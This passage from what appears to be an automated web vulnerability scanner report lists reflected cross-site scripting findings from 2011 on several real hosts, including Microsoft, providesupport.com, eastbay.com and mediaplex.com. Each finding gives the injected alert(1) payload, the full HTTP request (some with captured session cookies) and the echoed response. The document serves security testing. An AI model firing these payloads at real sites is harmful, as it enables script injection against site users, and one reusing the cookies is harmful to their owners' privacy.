The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9f2ce<img%20src%3da%20onerror%3dalert(1)>f78a009ec99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f2ce<img src=a onerror=alert(1)>f78a009ec99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=MSDN&loc=en-us&Refinement=182&watermark=Windows%20Hardware&focusOnInit=false&9f2ce<img%20src%3da%20onerror%3dalert(1)>f78a009ec99=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/windows/hardware/gg463028
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=9f1d1666ec7f6f4383aa85f0621e05dc&HASH=6616&LV=20117&V=3; MUID=9D76DAC5D4D147139C18D454161BD61E; mcI=Thu, 28 Jul 2011 22:51:18 GMT; s_vnum=1314903443621%26vn%3D1; s_nr=1312311501528; omniID=1312474778371_ca1f_74c4_9668_7286adce6a18; s_cc=true; WT_NVR_RU=0=msdn|technet:1=:2=; WT_FPC=id=50.23.123.106-2332126736.30164984:lv=1312464011179:ss=1312463978449; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=54d36fa2-a84f-4fde-b3e2-ba73f93558f6&Microsoft.CreationDate=08/04/2011 16:20:01&Microsoft.LastVisitDate=08/04/2011 16:20:12&Microsoft.NumberOfVisits=2&SessionCookie.Id=5D3A8D2644992D448AFAA24E31B70026; MSID=Microsoft.CreationDate=07/21/2011 22:50:10&Microsoft.LastVisitDate=08/04/2011 16:20:12&Microsoft.VisitStartDate=08/04/2011 16:20:01&Microsoft.CookieId=1f3c966e-de93-48a0-a622-dd22c1d969f7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=16&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0656-4650-6340-5940; MS0=b2fdbf8fd7bd414b9d8764f88f181e67; s_sq=msstomsdn%2Cmsstomsdnonly%2Cmsstomsdnmktenus%2Cmsstoctwin%3D%2526pid%253Dmsdn%25253A/en-us/windows/hardware/gg463009%2526pidt%253D1%2526oid%253Dhttp%25253A//msdn.microsoft.com/en-us/windows/hardware/gg462988%2526ot%253DA; A=I&I=AxUFAAAAAAB7BwAAAUMmz2VAX4qvvEu33TkKoQ!!&GO=122&M=1

Response

HTTP/1.1 200 OK
ntCoent-Length: 12994
Content-Type: application/x-javascript
ETag: 5ead7fd37a00d85d48edb100f901e032
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB37
Content-Length: 12994
Cache-Control: public, max-age=43201
Expires: Fri, 05 Aug 2011 04:21:01 GMT
Date: Thu, 04 Aug 2011 16:21:00 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
EmptySearch":false,"appId":"1","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=182&9f2ce<img src=a onerror=alert(1)>f78a009ec99=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Window
...[SNIP]...

2.112. http://image.providesupport.com/cmd/vpntunnelservice [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/vpntunnelservice

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33ec2<script>alert(1)</script>c74053c8b26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmd33ec2<script>alert(1)</script>c74053c8b26/vpntunnelservice?ps_t=1312283772567&ps_l=http%3A//www.vpnfortress.com/%3Fgclid%3DCKa8wP29sKoCFQWA5QodRiUB9Q&ps_r=&ps_s=Y5ZHpNxBXE7G HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.vpnfortress.com/?gclid=CKa8wP29sKoCFQWA5QodRiUB9Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=Y5ZHpNxBXE7G

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Tue, 02 Aug 2011 11:16:19 GMT
Content-Length: 577

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmd33ec2<script>alert(1)</script>c74053c8b26/vpntunnelservice?ps_t=1312283772567&ps_l=http://www.vpnfortress.com/?gclid=CKa8wP29sKoCFQWA5QodRiUB9Q&ps_r=&ps_s=Y5ZHpNxBXE7G
</pre>
...[SNIP]...

2.113. http://image.providesupport.com/js/vpntunnelservice/safe-monitor.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/vpntunnelservice/safe-monitor.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8bc63<script>alert(1)</script>dfdbbe7ae39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js8bc63<script>alert(1)</script>dfdbbe7ae39/vpntunnelservice/safe-monitor.js?ps_h=inl0&ps_t=1312283803461 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.vpnfortress.com/set-up-vpn.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=Y5ZHpNxBXE7G

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Tue, 02 Aug 2011 11:16:55 GMT
Content-Length: 576

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /js8bc63<script>alert(1)</script>dfdbbe7ae39/vpntunnelservice/safe-monitor.js?ps_h=inl0&ps_t=1312283803461
</pre>
<!-- ===================
...[SNIP]...

2.114. http://image.providesupport.com/js/vpntunnelservice/safe-monitor.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/vpntunnelservice/safe-monitor.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7368<a>46a3bdce52f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/vpntunnelserviceb7368<a>46a3bdce52f/safe-monitor.js?ps_h=inl0&ps_t=1312283803461 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.vpnfortress.com/set-up-vpn.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=Y5ZHpNxBXE7G

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Tue, 02 Aug 2011 11:16:55 GMT
Content-Length: 554

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/vpntunnelserviceb7368<a>46a3bdce52f/safe-monitor.js?ps_h=inl0&ps_t=1312283803461
</pre>
<!-- =========================================
...[SNIP]...

2.115. http://images.eastbay.com/is/image//EB/05712487 [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images.eastbay.com
Path:   /is/image//EB/05712487

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ff83d<img%20src%3da%20onerror%3dalert(1)>f044ec12716 was submitted in the id parameter. This input was echoed as ff83d<img src=a onerror=alert(1)>f044ec12716 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image//EB/05712487?req=imageset,json&id=147405806ff83d<img%20src%3da%20onerror%3dalert(1)>f044ec12716&_=1312290882134 HTTP/1.1
Host: images.eastbay.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.champssports.com/catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: "8968a8dad1b55c9aa38a1d1d5bdccc9d"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 150
Expires: Tue, 02 Aug 2011 13:20:47 GMT
Date: Tue, 02 Aug 2011 13:14:47 GMT
Connection: close

s7jsonResponse(
{"IMAGE_SET":"EB/05712487_cr_fr_sc7_cncrdwh;EB/05712487_cr_fr_sc7_cncrdwh"},"147405806ff83d<img src=a onerror=alert(1)>f044ec12716");

2.116. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa2f"-alert(1)-"6c2c16cea06 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112cfa2f"-alert(1)-"6c2c16cea06&mpt=7820111112&mpvc= HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:16:35 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "4f8d0b-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4301
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112cfa2f"-alert(1)-"6c2c16cea06");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112cfa2f"-alert(1)-"6c2c16cea06");
mpck =
...[SNIP]...

2.117. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36973'%3balert(1)//dba0f6a02ac was submitted in the mpck parameter. This input was echoed as 36973';alert(1)//dba0f6a02ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D782011111236973'%3balert(1)//dba0f6a02ac&mpt=7820111112&mpvc= HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:16:37 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "4f8d0b-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4307
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/16228-131652-26209-0?mpt=782011111236973';alert(1)//dba0f6a02ac" target="_blank">
...[SNIP]...

2.118. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53688'%3balert(1)//72d940fd171 was submitted in the mpvc parameter. This input was echoed as 53688';alert(1)//72d940fd171 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112&mpt=7820111112&mpvc=53688'%3balert(1)//72d940fd171 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:16:41 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "4f8d0b-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4303
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="53688';alert(1)//72d940fd171http://altfarm.mediaplex.com/ad/ck/16228-131652-26209-0?mpt=7820111112" target="_blank">
...[SNIP]...

2.119. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 514e5"%3balert(1)//00a4ac78bc5 was submitted in the mpvc parameter. This input was echoed as 514e5";alert(1)//00a4ac78bc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112&mpt=7820111112&mpvc=514e5"%3balert(1)//00a4ac78bc5 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:16:39 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "4f8d0b-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4303
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("514e5";alert(1)//00a4ac78bc5");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("514e5";alert(1)//00a4ac78bc5");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("514e5"%3balert(1)//00a4ac78bc5");
...[SNIP]...

2.120. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2b6"><script>alert(1)</script>0af112df9e8 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F17243-118150-27909-2%3Fmpt%3D9186272bb2b6"><script>alert(1)</script>0af112df9e8&mpt=9186272&mpvc=http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UKSPRA&cb=1745504480
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:39:10 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 11:27:52 GMT
ETag: "73b941-1166-4a90b56bffe00"
Accept-Ranges: bytes
Content-Length: 5390
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=http://adfarm.mediaplex.com/ad/ck/17243-118150-27909-2?mpt=9186272bb2b6"><script>alert(1)</script>0af112df9e8" target="_blank">
...[SNIP]...

2.121. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 207be"-alert(1)-"0ae888ebe0c was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F17243-118150-27909-2%3Fmpt%3D9186272207be"-alert(1)-"0ae888ebe0c&mpt=9186272&mpvc=http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UKSPRA&cb=1745504480
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:39:10 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 11:27:52 GMT
ETag: "73b941-1166-4a90b56bffe00"
Accept-Ranges: bytes
Content-Length: 5315
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=http://ad
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F17243-118150-27909-2%3Fmpt%3D9186272207be"-alert(1)-"0ae888ebe0c");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F17243-118150-27909-2%3Fmpt%3D9186272207be"-alert(1)-"0ae888ebe0c");
mpck
...[SNIP]...

2.122. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f28a'%3balert(1)//a5f5124cb44 was submitted in the mpck parameter. This input was echoed as 2f28a';alert(1)//a5f5124cb44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F17243-118150-27909-2%3Fmpt%3D91862722f28a'%3balert(1)//a5f5124cb44&mpt=9186272&mpvc=http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UKSPRA&cb=1745504480
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:39:10 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 11:27:52 GMT
ETag: "73b941-1166-4a90b56bffe00"
Accept-Ranges: bytes
Content-Length: 5321
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=http://ad
...[SNIP]...
<a href="http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=http://adfarm.mediaplex.com/ad/ck/17243-118150-27909-2?mpt=91862722f28a';alert(1)//a5f5124cb44" target="_blank">
...[SNIP]...

2.123. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 498af"><script>alert(1)</script>583203e11e9 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F17243-118150-27909-2%3Fmpt%3D9186272&mpt=9186272&mpvc=http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=498af"><script>alert(1)</script>583203e11e9 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UKSPRA&cb=1745504480
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:39:11 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 11:27:52 GMT
ETag: "73b941-1166-4a90b56bffe00"
Accept-Ranges: bytes
Content-Length: 5390
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=498af"><script>alert(1)</script>583203e11e9http://adfarm.mediaplex.com/ad/ck/17243-118150-27909-2?mpt=9186272" target="_blank">
...[SNIP]...

2.124. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 581b5"%3balert(1)//e9ef16281a8 was submitted in the mpvc parameter. This input was echoed as 581b5";alert(1)//e9ef16281a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F17243-118150-27909-2%3Fmpt%3D9186272&mpt=9186272&mpvc=http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=581b5"%3balert(1)//e9ef16281a8 HTTP/1.1
